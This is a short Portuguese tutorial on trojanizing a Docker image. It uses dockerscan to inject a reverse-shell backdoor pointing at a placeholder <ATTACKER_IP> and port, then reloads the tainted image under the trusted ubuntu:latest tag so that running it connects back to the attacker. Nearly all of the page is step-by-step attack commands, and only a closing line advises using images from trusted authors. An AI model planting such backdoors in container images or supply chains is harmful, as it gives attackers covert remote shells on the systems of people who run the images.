🚪Backdooring docker container
Apresentação
Podemos criar uma nova imagem da imagem alvo para implementar uma backdoor, para quando ela for executada nós tenhamos a capacidade de pegar uma reverse shell
Backdoor
Para isso vamos utilizar a ferramenta dockerscan, para o nosso exemplo eu vou estar utilizando a imagem do ubuntu.
# Baixar a imagem do ubuntu
docker pull ubuntu:latest
# Vamos salvar a imagem do ubuntu
docker save ubuntu:latest -o ubuntu-original
# Agora com o source da imagem vamos colocar o backdoor
dockerscan image modify trojanize ubuntu-original -l <ATTACKER_IP> -p <ATTACKER_PORT> -o ubuntu-backdoor
# Após gerar a imagem com o backdoor, vamos instalá-la
docker load -i ubuntu-backdoor.tar
# Agora só rodar e ver a reverse shell chegar
docker run -it ubuntu:latest /bin/bash

Conclusão
Ao baixar imagens para rodar em seu computador, certifique-se que elas são de autores confiavéis. Olhe como proteger seu ambiente de imagens não confiáveis aqui
Last updated